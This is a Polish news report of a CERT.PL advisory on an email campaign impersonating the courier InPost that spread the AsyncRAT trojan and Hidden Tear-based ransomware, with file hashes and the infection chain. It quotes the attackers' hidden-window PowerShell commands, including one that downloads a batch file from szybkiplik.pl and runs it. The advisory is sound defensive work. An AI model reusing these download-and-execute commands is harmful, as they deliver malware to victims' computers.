Polityka i prawo
Trojan oraz ransomware w kampanii podszywającej się pod InPost
CERT.PL informuje o złośliwej kampanii podszywającej się pod InPost. Głównym narzędziem wykorzystanym w incydencie jest wirus Trojan oraz oprogramowanie szyfrujące pliki – ransomware. Na stronie instytucji zamieszczono specjalne oświadczenie w tej sprawie.
Przez kilka ostatnich dni zaobserwowano kampanię e-mailową, w której fałszywi nadawcy podają się za firmę kurierską InPost. Wiadomości informują o przesyłce gotowej do odbioru w jednym z paczkomatów. Adres paczkomatu oraz pin potrzebny do odbioru przesyłki ma być dostępny po pobraniu pliku z linku widocznego w wiadomości. Do tej pory wyróżniono dwa typy zagrożeń, które czekają na użytkowników po uruchomieniu pobranych plików. Jednym z nich jest trojan pozwalający na zdalny dostęp do komputera ofiary, a drugim oprogramowanie szyfrujące pliki – ransomware.
Osobom, których pliki zostały zaszyfrowane zdecydowanie odradza się płacenia okupu. Poszkodowane osoby proszone są o bezpośredni kontakt pod adres [email protected], ponieważ jest szansa na odzyskanie plików.
W obu wariantach wiadomości wysłane zostały z adresu [email protected] z jednym z dwóch tematów:
- Informujemy, że w serwisie InPost zostało zarejestrowane zlecenie realizacji odbioru przesyłki, której jesteś odbiorcą.
- Ostateczne wezwanie do odbioru przesyłki z paczkomatu.
Linki w wiadomościach prowadzą do plików zamieszczonych w serwisie „szybkiplik.pl”.
Wariant z trojanem
Pobrane z linku w wiadomości archiwum ZIP zawiera pliki:
- InpPost24_-_Dane_odbioru_paczki.doc.lnk, SHA256: 4a3d55070214dcd6f646fd347a523cdcb61820c74902417720478131d382984d
- word.info.file,doc, SHA256: 20ce81e489337e6ae90c831945fcb4f493d2e2c117778b77ae62a5b4311c94bb
Dwukrotne kliknięcie na pierwszy plik (skrót systemu Windows) spowoduje uruchomienie następującego polecenia, oraz ostatecznie, drugiego z plików:
..\..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden cmd /c word.info.file.doc
Jest to trojan o nazwie „AsyncRAT”, którego kod źródłowy można znaleźć na portalu GitHub. W tym przypadku zostały zmodyfikowane właściwie tylko adresy serwera C&C – na serwery VPN z firmy AirVPN – w udostępnianej przez tę firmę usłudze umożliwiającej przekierowywanie konkretnych portów z internetu do podłączonego klienta VPN.
Trojan umożliwia przesłanie obrazu wyświetlanego na komputerze ofiary oraz pobieranie i uruchamianie kolejnych plików wykonywalnych.
Wariant z ransomware
W drugim wariancie ataku, link w wiadomości prowadzi do pobrania dokumentu PDF.
- bf4f76802ece7ec698fbe8328fd3cc3a.pdf, SHA256: 6c2b1c128608164c49166cd9449d13796a02eacdeba06978dbb3447b0d252926
Link z dokumentu PDF prowadzi z kolei do pliku AdobeUpdater.Bat.
- AdobeUpdater.Bat, SHA256: b43434d6e0da61f217525f35d12953ba162102d6a8f7b2ed344634b13bcd31b3
Uruchomienie tego pliku spowoduje pobranie i uruchomienie kolejnego etapu ataku:
PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile(‚https://szybkiplik.pl/files/cf9bbf4dd37dfaa787877dd6b07940c7.bat’,’%TEMP%\blessing.bat’);Start-Process ‚%TEMP%\blessing.bat’
- blessing.bat, SHA256: 8d2b2a942c9e646a5f388837137a650716e11d95730db7dfeae26ab46778ba99
Plik blessing.bat, wbrew swojemu rozszerzeniu, jest samorozpakowującym się archiwum stworzonym za pomocą programu WinRAR zawierającym pliki:
- 1.Bat, SHA256: c03408632b57ca17c25a5ea2e8342091b0f82ed37437959870ab20ed5a341ef3
- 2.bat, SHA256: 0bd43ba6dd7031a89f224b793044c31614ee1629f324c96e3336aa90330315cc
- 3.bat, SHA256: 53173953629bdb9b2506662a0c912a1cb3cde0c004a86fb02198bd0b2e8fbb00
- 4.bat, SHA256: ef5ef5c48f9fca2a1b9db5c25bff77a5739570f5cae72baf54243d73b65c7d58
- admin.exe, SHA256: dc310aebc5b718479c5c55af9bc82d4c898b53058b5780e61100dd81de084335
- AdobeAcrobatReader.exe, SHA256: b4507efac8dee9b9814f9bb4d0fadf1d539a0205f702e9d6a40ea613a37e91e3
- FORMA.exe, SHA256: d881db5358f86cb12e3c512c59ec94d9e96b24e12ecc454add145458a3b31f9f
- invisible.vbs, SHA256: 20a98a7e6e137bb1b9bd5ef6911a479cb8eac925b80d6db4e70b19f62a40cce2
Samorozpakowujące się archiwum mogą zawierać również polecenie automatycznego uruchomienia plików. W tym przypadku automatycznie po wypakowaniu do katalogu tymczasowego mają uruchomić się pliki batch: 3.bat oraz 4.bat, które bezpośrednio za pomocą skryptu VBS (ukrywającego okna wiersza polecenia Windows) uruchamiają 1.bat oraz 2.bat. Pierwszy z nich pobiera z serwisu szybkiplik.pl obrazek z notką od ransomware i ustawia ją jako tapetę, a drugi uruchamia aplikacje admin.exe oraz FORMA.exe.
FORMA.exe wyświetla notkę ransomware, a admin.exe prosząc o podniesienie uprawnień (UAC) uruchamia ostatecznie AdobeAcrobatReader.exe.
Kolejna warstwa zaciemniająca i odpakowująca złośliwy kod używa narzędzia Lime-Crypter napisanego w VisualBasic.NET.
Używając narzędzia dnSpy służącego do statycznej i dynamicznej analizy aplikacji .NET można łatwo odzyskać kolejną warstwę złośliwego oprogramowania. Należy znaleźć miejsce, w którym jest ona ostatecznie uruchamiana i stawiając tam breakpoint odzyskać odszyfrowany bufor.
Widać również, że pierwsze bajty odzyskanych danych to 0x4D, 0x5A, czyli „MZ”, więc mamy do czynienia z kolejnym plikiem wykonywalnym.
- hidden-tear-offline.exe, SHA256: 895bb91203381c18eeb48169cd9fb4f7f020ba1c21a5fd89190d11818520502e
Jest to zmodyfikowana wersja już zmodyfikowanego ransomware „Hidden Tear”. Aplikacja zaraz po uruchomieniu generuje klucz do szyfrowania plików, kopiuje się do katalogu użytkownika jako „table.exe” i uruchamia się stamtąd jeszcze raz. Następnie szyfruje pliki (algorytmem AES-256 w trybie CBC) według listy rozszerzeń zakodowanych w aplikacji, zapisywana jest notka ransomware (do pliku „ODSZYFRUJ_PLIKI_TERAZ.txt” na pulpicie) i usuwane są klucze.
Osoby, których pliki zostały zaszyfrowane proszone są o kontakt pod adres [email protected].
Podsumowanie
W przypadku posiadania wiadomości z potencjalnie złośliwymi linkami albo załącznikami, niekoniecznie z tej konkretnej kampanii, należy wysłać je w zgłoszeniach na stronie https://incydent.cert.pl lub mailowo na adres [email protected].
Co warte podkreślenia, oba warianty zagrożenia zostały zbudowane stosunkowo niskim nakładem sił, z użyciem lekko, bądź wcale, zmodyfikowanych projektów „edukacyjnego złośliwego oprogramowania” dostępnych publicznie oraz za darmo w serwisie GitHub. Zmodyfikowany ransomware użyty w ataku ma w serwisie GitHub już ponad 600 forków (kopii), z czego przynajmniej kilkanaście pod różnymi nazwami było używanych w kampaniach złośliwego oprogramowania. Z kolei autor trojana oraz cryptera użytych w tej kampanii ma na swoim githubowym koncie już 11 projektów/komponentów złośliwego oprogramowania. Aktywnie reklamuje je oraz oferuje wsparcie na forach „miłośników” stosowania „edukacyjnego złośliwego oprogramowania” w praktyce.
Źródło: CERT.PL